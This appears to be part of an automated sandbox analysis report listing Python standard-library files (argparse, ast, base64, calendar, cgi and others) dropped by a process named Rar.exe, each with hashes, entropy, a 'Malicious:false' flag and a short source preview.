                                                                                                                                                                                                                                  SHA-256:D30F7E5CA4A44F7BA9F1626E984B7099B42FEB603B9BA8E31635D9C889793EC1
                                                                                                                                                                                                                                  SHA-512:10D6E90BC739158597CF8AEA1616D8B02C2B72AD8EFADE9B3668A952179CC2A9AB5B92EDECB174821556F52EA0A9081575C90D2016DBFF6175D1F3E0A0F2284D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:# Author: Steven J. Bethard <steven.bethard@gmail.com>...# New maintainer as of 29 August 2019: Raymond Hettinger <raymond.hettinger@gmail.com>...."""Command-line parsing library....This module is an optparse-inspired command-line parsing library that:.... - handles both optional and positional arguments.. - produces highly informative usage messages.. - supports parsers that dispatch to sub-parsers....The following is a simple usage example that sums integers from the..command-line and writes the result to a file::.... parser = argparse.ArgumentParser(.. description='sum the integers at the command line').. parser.add_argument(.. 'integers', metavar='int', nargs='+', type=int,.. help='an integer to be summed').. parser.add_argument(.. '--log', default=sys.stdout, type=argparse.FileType('w'),.. help='the file where the sum should be written').. args = parser.parse_args().. args.log.write('%s' % sum(args.integers)).. args.lo
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):61609
                                                                                                                                                                                                                                  Entropy (8bit):4.417126699054812
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:pZuW0/yNX9e8T1Y+XqfdAyr8+gliw1RaDh1:pZnMyNX9/qeyI+glN1s1
                                                                                                                                                                                                                                  MD5:38ECD2B58AF252AC5A2D14A5AC17333B
                                                                                                                                                                                                                                  SHA1:F5EC2EE9D098AF6432017029E2B14B0230581ADF
                                                                                                                                                                                                                                  SHA-256:A1D8E96B987376D7E0CE57587830EBAA7E06509EA528D666B409D5604D1EAA8D
                                                                                                                                                                                                                                  SHA-512:BACE88F6DA88662BBC5A49E6617478553C2FE287CE1D46CCA77483F63FBE82849EBA45824CEE7AA57FF4F820F1024E331AF51FE46E353535D9D68160DA424848
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:""".. ast.. ~~~.... The `ast` module helps Python applications to process trees of the Python.. abstract syntax grammar. The abstract syntax itself might change with.. each Python release; this module helps to find out programmatically what.. the current grammar looks like and allows modifications of it..... An abstract syntax tree can be generated by passing `ast.PyCF_ONLY_AST` as.. a flag to the `compile()` builtin function or by using the `parse()`.. function from this module. The result will be a tree of objects whose.. classes all inherit from `ast.AST`..... A modified abstract syntax tree can be compiled into a Python code object.. using the built-in `compile()` function..... Additionally various helper functions are provided that make working with.. the trees simpler. The main intention of the helper functions and this.. module in general is to provide an easy to use interface for libraries.. that work tightly with the python sy
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11835
                                                                                                                                                                                                                                  Entropy (8bit):4.533400669114703
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:jrq3jJ1vi4b1/AwyG5XcoIhlJCmO7IDzAEyeWdm2aIb:fq3jJRthARG9comK7KzAEyeWdm4
                                                                                                                                                                                                                                  MD5:A089EF65FD800EEB88D57F8752C14409
                                                                                                                                                                                                                                  SHA1:31ADE2E4DEDE4D6B60CCA9A484858A5552A0E533
                                                                                                                                                                                                                                  SHA-256:8F64AACF08D17F0D9EE51BBB540A5D2662ACB0F7C68009E895AC39D8973039A4
                                                                                                                                                                                                                                  SHA-512:8D3DC6975E0DA00046C867E77D5C33D3197A7D4A5E5CECD43DC31B35C4D32B300BB3201A82AF4919A6A084A3540AD61DEC521DE7F405742BF6C323AA5047F6B9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:# -*- Mode: Python; tab-width: 4 -*-..# Id: asynchat.py,v 2.26 2000/09/07 22:29:26 rushing Exp..# Author: Sam Rushing <rushing@nightmare.com>....# ======================================================================..# Copyright 1996 by Sam Rushing..#..# All Rights Reserved..#..# Permission to use, copy, modify, and distribute this software and..# its documentation for any purpose and without fee is hereby..# granted, provided that the above copyright notice appear in all..# copies and that both that copyright notice and this permission..# notice appear in supporting documentation, and that the name of Sam..# Rushing not be used in advertising or publicity pertaining to..# distribution of the software without specific, written prior..# permission...#..# SAM RUSHING DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE,..# INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS, IN..# NO EVENT SHALL SAM RUSHING BE LIABLE FOR ANY SPECIAL, IND
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):20917
                                                                                                                                                                                                                                  Entropy (8bit):4.558999571418994
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:zrq3jJ1mtqOelBAVAWAm8HA2F13/29sq98ousJ9/k/u6QkAl+o/T1E06xkScEu9n:vq3jJwtq9lAAFAWzi1BSBk5
                                                                                                                                                                                                                                  MD5:392F12822B5A0A36504480D5B7DFC034
                                                                                                                                                                                                                                  SHA1:9180B8AA149971D3F96C7343F01307E3092A8A59
                                                                                                                                                                                                                                  SHA-256:8045DAC420E2A61BBA0474613F93282912A521AADDC027589158459DA2092469
                                                                                                                                                                                                                                  SHA-512:29F03D5411E003EC617CCB1B925A5C578B4BCD77FD34B6DE16EA592047975EED8FEDECD1C7E86082D3817B0A522436E93DB846025C72B33BBA9472D79EDD0E67
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:# -*- Mode: Python -*-..# Id: asyncore.py,v 2.51 2000/09/07 22:29:26 rushing Exp..# Author: Sam Rushing <rushing@nightmare.com>....# ======================================================================..# Copyright 1996 by Sam Rushing..#..# All Rights Reserved..#..# Permission to use, copy, modify, and distribute this software and..# its documentation for any purpose and without fee is hereby..# granted, provided that the above copyright notice appear in all..# copies and that both that copyright notice and this permission..# notice appear in supporting documentation, and that the name of Sam..# Rushing not be used in advertising or publicity pertaining to..# distribution of the software without specific, written prior..# permission...#..# SAM RUSHING DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE,..# INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS, IN..# NO EVENT SHALL SAM RUSHING BE LIABLE FOR ANY SPECIAL, INDIRECT OR..# CONSEQUENT
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):21450
                                                                                                                                                                                                                                  Entropy (8bit):4.817384784161953
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:j+uTwvnidNdYaBM+3m8dvd936r34MJIz5V1d:9EANdlBM+3m8dvd936kfz57d
                                                                                                                                                                                                                                  MD5:430BEF083EDC3857987FA9FDFAD40A1B
                                                                                                                                                                                                                                  SHA1:53BD3144F2A93454D747A765AC63F14056428A19
                                                                                                                                                                                                                                  SHA-256:2BDCB6D9EDFD97C91BC8AB325FCC3226C71527AA444ADB0A4ED70B60C18C388D
                                                                                                                                                                                                                                  SHA-512:7C1B8EA49BA078D051F6F21F99D8E51DC25F790E3DAFF63F733124FC7CF89417A75A8F4565029B1F2EB17F545250E1087F04ECB064022907D2D59F6430912B3A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:#! /usr/bin/env python3...."""Base16, Base32, Base64 (RFC 3548), Base85 and Ascii85 data encodings"""....# Modified 04-Oct-1995 by Jack Jansen to use binascii module..# Modified 30-Dec-2003 by Barry Warsaw to add full RFC 3548 support..# Modified 22-May-2007 by Guido van Rossum to use bytes everywhere....import re..import struct..import binascii......__all__ = [.. # Legacy interface exports traditional RFC 2045 Base64 encodings.. 'encode', 'decode', 'encodebytes', 'decodebytes',.. # Generalized interface for other encodings.. 'b64encode', 'b64decode', 'b32encode', 'b32decode',.. 'b32hexencode', 'b32hexdecode', 'b16encode', 'b16decode',.. # Base85 and Ascii85 encodings.. 'b85encode', 'b85decode', 'a85encode', 'a85decode',.. # Standard Base64 encoding.. 'standard_b64encode', 'standard_b64decode',.. # Some common Base64 alternatives. As referenced by RFC 3458, see thread.. # starting at:.. #.. # http://zgp.org/pipermail/p2p-hackers/2001-September/00
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):33287
                                                                                                                                                                                                                                  Entropy (8bit):4.376029848133808
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:jv2yeGid9OJ5zweRTWR8mQL+7bN3Lczaa7iXBW8wVdsF/isFuJQMFIqZ4F9bFxS:jvYVd9OH7s81+7xczaaeXkgwBqqZoS
                                                                                                                                                                                                                                  MD5:6C933F78BA56372D681B34FEEC71EEE5
                                                                                                                                                                                                                                  SHA1:BDC267A6CD41185C864E3594D6DBB5928F23910F
                                                                                                                                                                                                                                  SHA-256:B2FE296B24FAF056B199ECEFB3752088479C218429B9422D30E2E5C0CEF163A6
                                                                                                                                                                                                                                  SHA-512:028F20AF9575626691847B9882CAA9BAF7CD24C3E764CE66505173D2F904A422744247488540D895B797D51D7278C02C38310199E0C46F964B03061717762F7C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:"""Debugger basics"""....import fnmatch..import sys..import os..from inspect import CO_GENERATOR, CO_COROUTINE, CO_ASYNC_GENERATOR....__all__ = ["BdbQuit", "Bdb", "Breakpoint"]....GENERATOR_AND_COROUTINE_FLAGS = CO_GENERATOR | CO_COROUTINE | CO_ASYNC_GENERATOR......class BdbQuit(Exception):.. """Exception to give up completely."""......class Bdb:.. """Generic Python debugger base class..... This class takes care of details of the trace facility;.. a derived class should implement user interaction... The standard debugger class (pdb.Pdb) is an example..... The optional skip argument must be an iterable of glob-style.. module name patterns. The debugger will not step into frames.. that originate in a module that matches one of these patterns... Whether a frame is considered to originate in a certain module.. is determined by the __name__ in the frame globals... """.... def __init__(self, skip=None):.. self.skip = set(skip) if skip else None..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):15286
                                                                                                                                                                                                                                  Entropy (8bit):4.473768652352682
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:ckFvMjtNaabEsUKEbyh8E3HggxlfCdchpgjTmMTJ+XI7hut:rvMjeCfgchpATmMTAXUhut
                                                                                                                                                                                                                                  MD5:5FC5580386DF83003AD1993BAC736976
                                                                                                                                                                                                                                  SHA1:3713A4E0B8CCD4BA68C90B0A2C9EB7FD45B6E901
                                                                                                                                                                                                                                  SHA-256:E2BE54DE2B60C5AE1097FDD617CFFA57543F0C27CBFCD35BED98056A8896112A
                                                                                                                                                                                                                                  SHA-512:E03BB610FAD318CEA0BD6325C3FC09E773C7A520B30D4B3FD9267479A25D92E7F55E007856B11C34857497296898AC3A8B1C0406AA07C456EFAF90AFB4E1F2F0
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:"""Macintosh binhex compression/decompression.....easy interface:..binhex(inputfilename, outputfilename)..hexbin(inputfilename, outputfilename).."""....#..# Jack Jansen, CWI, August 1995...#..# The module is supposed to be as compatible as possible. Especially the..# easy interface should work "as expected" on any platform...# XXXX Note: currently, textfiles appear in mac-form on all platforms...# We seem to lack a simple character-translate in python...# (we should probably use ISO-Latin-1 on all but the mac platform)...# XXXX The simple routines are too simple: they expect to hold the complete..# files in-core. Should be fixed...# XXXX It would be nice to handle AppleDouble format on unix..# (for servers serving macs)...# XXXX I don't understand what happens when you get 0x90 times the same byte on..# input. The resulting code (xx 90 90) would appear to be interpreted as an..# escaped *value* of 0x90. All coders I've seen appear to ignore this nicety.....#..import binascii..import co
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3245
                                                                                                                                                                                                                                  Entropy (8bit):4.315031092069688
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:zPKqBnBS/P2bld2S/xu47KHBntS/cEmXNYldcS/Dsuz:rnBBSn2bySJu47MBtSEEmXNYwSbtz
                                                                                                                                                                                                                                  MD5:83E7F736E1877AF35CF077675DE88849
                                                                                                                                                                                                                                  SHA1:F4EC527F0164CA35653C546D20D78680E359AADA
                                                                                                                                                                                                                                  SHA-256:05D6B239EE3D6114A682AA9A5EFB8F8B315CCE6FC2A5D6F1147192AB5A044F44
                                                                                                                                                                                                                                  SHA-512:A511F888A7BE2D58846F9DF8694699638797151EA992A954F982761102BA8C6DB5794F4CCFA3C8F36C997FF349C2EC3482E0353A71D4564958C12BFD2093DDAD
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:"""Bisection algorithms."""......def insort_right(a, x, lo=0, hi=None, *, key=None):.. """Insert item x in list a, and keep it sorted assuming a is sorted..... If x is already in a, insert it to the right of the rightmost x..... Optional args lo (default 0) and hi (default len(a)) bound the.. slice of a to be searched... """.. if key is None:.. lo = bisect_right(a, x, lo, hi).. else:.. lo = bisect_right(a, key(x), lo, hi, key=key).. a.insert(lo, x)......def bisect_right(a, x, lo=0, hi=None, *, key=None):.. """Return the index where to insert item x in list a, assuming a is sorted..... The return value i is such that all e in a[:i] have e <= x, and all e in.. a[i:] have e > x. So if x already appears in the list, a.insert(i, x) will.. insert just after the rightmost x already there..... Optional args lo (default 0) and hi (default len(a)) bound the.. slice of a to be searched... """.... if lo < 0:.. raise ValueError('
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12191
                                                                                                                                                                                                                                  Entropy (8bit):4.488567907611872
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:wzhNfE8LZDY+YEzU3/OF/q+FjqqxbWXVvScmwWa0r1LAd1ichQiilHfP6Qhc9O1O:KLrXX/q+FjZWq2Wan3oxc8NE0Bx4
                                                                                                                                                                                                                                  MD5:C7F6B929829D1196DFC6C59BFA8BE4D5
                                                                                                                                                                                                                                  SHA1:2B0A3AF1F680F8D70E05A25AA8552A47E5109F7D
                                                                                                                                                                                                                                  SHA-256:A539FC503737C53D5A45272E33A435B8A6B7A8559BA6A425002978038096BD66
                                                                                                                                                                                                                                  SHA-512:63BFA9AD43141C609436B928F7DEBB5477188F1E7B30EBD6D9CC5080DB6D10FBF4E94C25BEC3E2C7DC8677D7BCD537B93550324A08B5376FD9E35184A8517E3B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:"""Interface to the libbzip2 compression library.....This module provides a file interface, classes for incremental..(de)compression, and functions for one-shot (de)compression..."""....__all__ = ["BZ2File", "BZ2Compressor", "BZ2Decompressor",.. "open", "compress", "decompress"]....__author__ = "Nadeem Vawda <nadeem.vawda@gmail.com>"....from builtins import open as _builtin_open..import io..import os..import _compression....from _bz2 import BZ2Compressor, BZ2Decompressor......_MODE_CLOSED = 0.._MODE_READ = 1..# Value 2 no longer used.._MODE_WRITE = 3......class BZ2File(_compression.BaseStream):.... """A file object providing transparent bzip2 (de)compression..... A BZ2File can act as a wrapper for an existing file object, or refer.. directly to a named file on disk..... Note that BZ2File provides a *binary* file interface - data read is.. returned as bytes, and data to be written should be given as bytes... """.... def __init__(self, filename, mo
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6525
                                                                                                                                                                                                                                  Entropy (8bit):4.383466107396597
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:GJRbR7raBofIUXCM/nRwcIxjZzxjl7ThaGDDj0:G/1CeIKZMZzxh7Nu
                                                                                                                                                                                                                                  MD5:E033728A638E731841FB31E026BF27F6
                                                                                                                                                                                                                                  SHA1:718766B787EE3EBD4627BB1EDEEEAFE328F9DF82
                                                                                                                                                                                                                                  SHA-256:8ED9EDFE153C6A3CCB3F0AAF1EBE57EE506DBDCF9ADC98063A9412B40AD78602
                                                                                                                                                                                                                                  SHA-512:34C9B6B2DA68028CB0242BB757604A6FF7FD2CD67534BFBC5D73282FD8043A92350E1D9E255BE064531D8F01E339F26EE983D1256293DEA48190AD76A6D0F20F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:#! /usr/bin/env python3...."""Python interface for the 'lsprof' profiler... Compatible with the 'profile' module..."""....__all__ = ["run", "runctx", "Profile"]....import _lsprof..import profile as _pyprofile....# ____________________________________________________________..# Simple interface....def run(statement, filename=None, sort=-1):.. return _pyprofile._Utils(Profile).run(statement, filename, sort)....def runctx(statement, globals, locals, filename=None, sort=-1):.. return _pyprofile._Utils(Profile).runctx(statement, globals, locals,.. filename, sort)....run.__doc__ = _pyprofile.run.__doc__..runctx.__doc__ = _pyprofile.runctx.__doc__....# ____________________________________________________________....class Profile(_lsprof.Profiler):.. """Profile(timer=None, timeunit=None, subcalls=True, builtins=True).... Builds a profiler object using the specified timer function... The default timer is a fast built-in one based on r
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):25334
                                                                                                                                                                                                                                  Entropy (8bit):4.630646062928224
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:TyXrfTnK3ZC77ZRVBfdPRSEFsW8ehzEOPs7OKkmw3:TyXbTnK3Wfvf7SE+W8euOPs7g1
                                                                                                                                                                                                                                  MD5:BDF280E9D5F52895524695699119B833
                                                                                                                                                                                                                                  SHA1:B4AF7451AC4FD85D86C9262B44CA3C1072461B11
                                                                                                                                                                                                                                  SHA-256:36E622CAC77F97C83E44EEF3FF39B02DAF63B831E057679E1387F45B48C9BFBF
                                                                                                                                                                                                                                  SHA-512:FF884EB6927AB18BABD1B843FE6AAADC83A4F92E2606BC3B077D19729529C44C9C434A48323B2BAE20F255CE3609C89552FF335F03F1E21277F0E624AD1C0141
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:"""Calendar printing functions....Note when comparing these calendars to the ones printed by cal(1): By..default, these calendars have Monday as the first day of the week, and..Sunday as the last (the European convention). Use setfirstweekday() to..set the first day of the week (0=Monday, 6=Sunday)."""....import sys..import datetime..import locale as _locale..from itertools import repeat....__all__ = ["IllegalMonthError", "IllegalWeekdayError", "setfirstweekday",.. "firstweekday", "isleap", "leapdays", "weekday", "monthrange",.. "monthcalendar", "prmonth", "month", "prcal", "calendar",.. "timegm", "month_name", "month_abbr", "day_name", "day_abbr",.. "Calendar", "TextCalendar", "HTMLCalendar", "LocaleTextCalendar",.. "LocaleHTMLCalendar", "weekheader",.. "MONDAY", "TUESDAY", "WEDNESDAY", "THURSDAY", "FRIDAY",.. "SATURDAY", "SUNDAY"]....# Exception raised for bad input (with string parameter for details)..error = Valu
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):35103
                                                                                                                                                                                                                                  Entropy (8bit):4.561073317486329
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:HJv4jDz46jcJeYMs0s1mZrgmTJFg9kAQNM0KJkY:HB4A6jcV0swZrgIJFg9kAQNM0KJkY
                                                                                                                                                                                                                                  MD5:8F647F8C3398EF82CCDF1BFF189E5396
                                                                                                                                                                                                                                  SHA1:9B561E19C640AB1B6177FF15D3DB65AFAF5355CA
                                                                                                                                                                                                                                  SHA-256:38088BEE5D627AD53A309DC1E66997DA87FEB238A5473A24E8568589226CDD31
                                                                                                                                                                                                                                  SHA-512:C12A3E0F1A099E4600295013CDF1071AE455C25CFB69147336C1251B96FF104EDA88EF429C364D13950B0E1C950B00C664ED14BE84F03BB6CC8654B254E21C83
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:#! /usr/local/bin/python....# NOTE: the above "/usr/local/bin/python" is NOT a mistake. It is..# intentionally NOT "/usr/bin/env python". On many systems..# (e.g. Solaris), /usr/local/bin is not in $PATH as passed to CGI..# scripts, and /usr/local/bin is the default directory where Python is..# installed, so /usr/bin/env would be unable to find python. Granted,..# binary installations by Linux vendors often install Python in..# /usr/bin. So let those vendors patch cgi.py to match their choice..# of installation....."""Support module for CGI (Common Gateway Interface) scripts.....This module defines a number of utilities for use by CGI scripts..written in Python..."""....# History..# -------..#..# Michael McLay started this module. Steve Majewski changed the..# interface to SvFormContentDict and FormContentDict. The multipart..# parsing was inspired by code submitted by Andreas Paepcke. Guido van..# Rossum rewrote, reformatted and documented the module and is currently..# respons
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12417
                                                                                                                                                                                                                                  Entropy (8bit):4.597855983527975
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:Cs8wrqrtx1PM/iy/UOt+JeyDUMkJo/tXR:V8t14/N+JvxkJEVR
                                                                                                                                                                                                                                  MD5:96E289FA4C662E66654E57C8B7BCFCBA
                                                                                                                                                                                                                                  SHA1:941AD05DEEF8F2FA0D6FA425BB01D7EAD90DDCDA
                                                                                                                                                                                                                                  SHA-256:F0BC49E9C3410E447635E639E7C925298C063438E8243755084450963740BD8B
                                                                                                                                                                                                                                  SHA-512:2B5C269319F535017C5B0BB94E6C12F3C51FC6DCC9D9F2E960818D87E07FDB3D50B3E42FE1EB3364BF71ED8FF1FA730813104BAA2D3B50DDA23121654AF487F2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:"""More comprehensive traceback formatting for Python scripts.....To enable this module, do:.... import cgitb; cgitb.enable()....at the top of your script. The optional arguments to enable() are:.... display - if true, tracebacks are displayed in the web browser.. logdir - if set, tracebacks are written to files in this directory.. context - number of lines of source code to show for each stack frame.. format - 'text' or 'html' controls the output format....By default, tracebacks are displayed but not saved, the context is 5 lines..and the output format is 'html' (for backwards compatibility with the..original use of this module)....Alternatively, if you have caught an exception and want cgitb to display it..for you, call cgitb.handler(). The optional argument to handler() is a..3-item tuple (etype, evalue, etb) just like the value of sys.exc_info()...The default handler displays output as HTML....."""..import inspect..import keyword..import linecache
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5604
                                                                                                                                                                                                                                  Entropy (8bit):4.3736641383152
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:Or09dhcWG/Fu2EC6Gyk6h8zsGx/SAojX6wu/YBsrgS:OV40whqs06Dul1v
                                                                                                                                                                                                                                  MD5:9593CA4791DDE9A600B40AFE78A0A1D1
                                                                                                                                                                                                                                  SHA1:D17F6A3716407202553A1BED556096B965A47525
                                                                                                                                                                                                                                  SHA-256:F71F8B77021C6224A772C5F8C56041D5D114E78E099E315754E502257ADDE3EC
                                                                                                                                                                                                                                  SHA-512:EEB3A00A6773F19F1403E502DDC15177383B77D752213BE49ECE4EC1FEAE1CB80DBE0F958AA077DBCC7665A60FB522B57B807E079F73A0E6CC11202FEB1C3BF8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:"""Simple class to read IFF chunks.....An IFF chunk (used in formats such as AIFF, TIFF, RMFF (RealMedia File..Format)) has the following structure:....+----------------+..| ID (4 bytes) |..+----------------+..| size (4 bytes) |..+----------------+..| data |..| ... |..+----------------+....The ID is a 4-byte string which identifies the type of chunk.....The size field (a 32-bit value, encoded using big-endian byte order)..gives the size of the whole chunk, including the 8-byte header.....Usually an IFF-type file consists of one or more chunks. The proposed..usage of the Chunk class defined here is to instantiate an instance at..the start of each chunk and read from the instance until it reaches..the end, after which a new instance can be instantiated. At the end..of the file, creating a new instance will fail with an EOFError..exception.....Usage:..while True:.. try:.. chunk = Chunk(file).. except EOFError:.. break.. chunktype = chunk.get
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):15261
                                                                                                                                                                                                                                  Entropy (8bit):4.215201021902796
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:PL0k/Lx0tTb7zgerjv/DrjydCD1azzAr3hBaUcWkfN7XBT5FMk:PL07tTbnge/zrjOcuAr3hTctfNN
                                                                                                                                                                                                                                  MD5:876EE912FD5D3663B4B6E9F2A46ACFFA
                                                                                                                                                                                                                                  SHA1:F097BE06A4249B38C56E2B7E309A2D1C7B5B3CB3
                                                                                                                                                                                                                                  SHA-256:2AE247591ED62FEE5E0DDF05D97EDECB3ACE71B752B1A3DF84CD5CD7FEA9B37F
                                                                                                                                                                                                                                  SHA-512:54AEB21E831EBEE41AA5C8F5099B9C2C605B45F74A9C45982DB6294ADDF799C7C3646101CCB2977F5DF2EB9D5C847C81D3CD49DA09E1E26A91A63B4E08592186
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:"""A generic class to build line-oriented command interpreters.....Interpreters constructed with this class obey the following conventions:....1. End of file on input is processed as the command 'EOF'...2. A command is parsed out of each line by collecting the prefix composed.. of characters in the identchars member...3. A command `foo' is dispatched to a method 'do_foo()'; the do_ method.. is passed a single argument consisting of the remainder of the line...4. Typing an empty line repeats the last command. (Actually, it calls the.. method `emptyline', which may be overridden in a subclass.)..5. There is a predefined `help' method. Given an argument `topic', it.. calls the command `help_topic'. With no arguments, it lists all topics.. with defined help_ functions, broken into up to three topics; documented.. commands, miscellaneous help topics, and undocumented commands...6. The command '?' is a synonym for `help'. The command '!' is a synonym.. for `shell', if a do_
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):10937
                                                                                                                                                                                                                                  Entropy (8bit):4.358655405051517
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:BXaaxojmnJG2eGKSOwyTe4J54iLxqeKon:BXaanlt8eoCMbKo
